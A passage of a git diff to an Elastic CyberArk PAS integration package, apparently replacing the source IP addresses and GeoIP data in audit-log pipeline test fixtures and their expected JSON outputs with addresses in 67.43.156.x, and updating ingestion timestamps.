14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.022918200Z", + "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" } @@ -359,20 +313,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -392,20 +334,20 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T16:59:58Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e105\u003c/MessageID\u003e\n \u003cDesc\u003eAdd File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eAdd File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e105\u003c/MessageID\u003e\n \u003cDesc\u003eAdd File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eAdd File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Add File Category", "issuer": "PSMPApp_VAGRANT", "rfc5424": true, "file": "Root\\PSMPApp_VAGRANT.LiveSessions", "safe": "PSMPLiveSessions", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add File Category", "category": "_PSMLiveSessions_1", "timestamp": "Mar 11 08:59:58", @@ -418,8 +360,8 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-06-09T10:24:27.789492200Z", - "original": "\u003c5\u003e1 2021-03-11T16:59:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e105\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eAdd File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:58\",\"IsoTimestamp\":\"2021-03-11T16:59:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_VAGRANT.LiveSessions\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.022924500Z", + "original": "\u003c5\u003e1 2021-03-11T16:59:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e105\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eAdd File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:58\",\"IsoTimestamp\":\"2021-03-11T16:59:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_VAGRANT.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log index 14adbc29da4..f6be50ea2bc 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log @@ -1,6 +1,6 @@ <5>1 2021-03-08T18:25:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:25:52","IsoTimestamp":"2021-03-08T18:25:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"Administrator","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"Address","RequestId":"","Reason":"Value=[components] Old Value=[Address]","ExtraDetails":"","Message":"Update File Category","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} -<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_VAGRANT\n Update File Category\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.session\n 81.32.170.205\n \n PSMStatus\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.session","Station":"81.32.170.205","Location":"","Category":"PSMStatus","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} -<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMApp_ASR-WIN\n Update File Category\n \n \n PSMLiveSessions\n Root\\PSM-ASR-CYBERARK-WI.LiveSessions\n 34.66.114.180\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"34.66.114.180","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} -<5>1 2021-03-14T13:49:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:38\n 2021-03-14T13:49:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_SSH\n Update File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 34.71.250.247\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:38","IsoTimestamp":"2021-03-14T13:49:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"34.71.250.247","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.13","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.14","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_VAGRANT\n Update File Category\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.session\n 67.43.156.13\n \n PSMStatus\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.session","Station":"67.43.156.13","Location":"","Category":"PSMStatus","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMApp_ASR-WIN\n Update File Category\n \n \n PSMLiveSessions\n Root\\PSM-ASR-CYBERARK-WI.LiveSessions\n 67.43.156.15\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.15","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-14T13:49:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:38\n 2021-03-14T13:49:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_SSH\n Update File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 67.43.156.15\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:38","IsoTimestamp":"2021-03-14T13:49:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"67.43.156.15","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log-expected.json index 92a1e6cd58c..ed15633b613 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log-expected.json @@ -63,7 +63,7 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-06-09T10:24:28.164116100Z", + "ingested": "2021-12-09T13:36:36.540129800Z", "original": "\u003c5\u003e1 2021-03-08T18:25:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:25:52\",\"IsoTimestamp\":\"2021-03-08T18:25:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WinDesktopLocal-Address-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"Address\",\"RequestId\":\"\",\"Reason\":\"Value=[components] Old Value=[Address]\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "106", "kind": "event" @@ -76,20 +76,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -109,7 +97,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -119,7 +107,7 @@ "iso_timestamp": "2021-03-10T18:46:48Z", "file": "Root\\PSMServer.LiveSessions", "safe": "PSMLiveSessions", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Update File Category", "message": "Update File Category", "category": "_PSMLiveSessions_1", @@ -134,8 +122,8 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-06-09T10:24:28.164140400Z", - "original": "\u003c5\u003e1 2021-03-10T18:46:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:48\",\"IsoTimestamp\":\"2021-03-10T18:46:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.540137800Z", + "original": "\u003c5\u003e1 2021-03-10T18:46:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:48\",\"IsoTimestamp\":\"2021-03-10T18:46:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" } @@ -147,19 +135,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -179,7 +156,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -189,7 +166,7 @@ "iso_timestamp": "2021-03-10T22:20:12Z", "file": "Root\\PSM-ASR-CYBERARK-WI.LiveSessions", "safe": "PSMLiveSessions", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Update File Category", "message": "Update File Category", "category": "_PSMLiveSessions_1", @@ -204,8 +181,8 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-06-09T10:24:28.164146400Z", - "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.540143Z", + "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" } @@ -217,20 +194,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - 